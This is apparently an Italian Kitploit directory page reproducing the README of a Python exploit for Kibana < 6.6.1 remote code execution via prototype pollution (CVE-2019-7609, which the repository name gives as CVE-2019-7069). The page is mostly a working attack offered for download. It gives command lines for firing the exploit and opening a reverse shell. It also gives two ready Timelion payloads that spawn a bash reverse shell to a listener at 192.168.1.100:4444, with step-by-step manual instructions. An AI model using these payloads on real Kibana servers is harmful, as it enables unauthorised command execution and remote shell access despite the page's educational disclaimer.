Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-7069-POC — Exploit Python 3 per Kibana < 6.6.1 RCE (CVE-2019-7609) tramite prototype pollution, con rilevamento automatico della versione e reverse shell opzionale. | Kitploit
Strumenti/GitHubGitHub/caelumisme/cve-2019-7069-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Exploit Python 3 per Kibana < 6.6.1 RCE (CVE-2019-7609) tramite prototype pollution, con rilevamento automatico della versione e reverse shell opzionale.

Vedi Repository
111 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di Remote Code Execution per Kibana < 6.6.1 (CVE-2019-7609)

Exploit Banner

🚨 Exploit RCE Educativo 🚨

Autore: LandGrey (Refactoring Python3 di [Il Tuo Nome])
Riferimento: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ Dichiarazione di non responsabilità:
Questo script è solo per scopi educativi e test di penetrazione autorizzati. Non utilizzarlo su sistemi di cui non possiedi o per i quali non hai esplicita autorizzazione. L'autore e i collaboratori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.


🎯 Cos'è?

Questo è uno script exploit Python 3 per la vulnerabilità di Remote Code Execution nelle versioni di Kibana < 6.6.1. Sfrutta una falla di prototype pollution per eseguire comandi arbitrari, inclusa l'apertura di una reverse shell, su un'istanza vulnerabile di Kibana.

🕹️ Caratteristiche

  • Rileva automaticamente la versione di Kibana
  • Verifica lo stato della vulnerabilità
  • Opzionalmente attiva una reverse shell verso il tuo listener
  • Output del terminale pulito e interattivo
  • Completamente compatibile con Python 3

📚 Riferimenti

  • Voce Exploit-DB 46651
  • Sito Ufficiale di Kibana
  • CVE-2019-7609

🚀 Utilizzo

python3 kibana_exploit.py -u http://target-kibana:5601

Per attivare una reverse shell:

python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

Esempio

python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ Requisiti

  • Python 3.x
  • requests library
  • packaging library

Installa le dipendenze con:

pip install requests packaging

💡 Sfruttamento Manuale tramite Timelion

Puoi anche sfruttare questa vulnerabilità manualmente utilizzando il visualizzatore Timelion di Kibana:

  1. Apri Kibana
  2. Incolla uno dei seguenti payload nel visualizzatore Timelion
  3. Clicca Esegui
  4. Nel pannello sinistro, clicca su Canvas
  5. La tua reverse shell dovrebbe apparire! :)

Payload di securityMB:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Payload di chybeta:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Sostituisci 192.168.1.100 e 4444 con il tuo IP e porta del listener.


🧩 Come Funziona

  • Rileva la versione di Kibana tramite richiesta HTTP
  • Verifica se il target è vulnerabile a CVE-2019-7609
  • Sfrutta la prototype pollution per eseguire comandi arbitrari
  • Opzionalmente genera una reverse shell verso l'host e la porta specificati

🎨 Output

Lo script fornisce un output chiaro e passo-passo per rilevamento, verifica e sfruttamento, rendendolo facile da seguire e divertente da usare!


👾 Per Divertimento e Apprendimento

Questo script è un ottimo modo per imparare sulla prototype pollution, l'esecuzione di codice remoto e le tecniche di penetration testing. Usalo responsabilmente e sempre con permesso!


📝 Licenza

Questo progetto è solo per uso educativo. Nessuna garanzia, nessuna assicurazione. Hackerare eticamente, rimanere curiosi e divertirsi!

Scarica lo strumento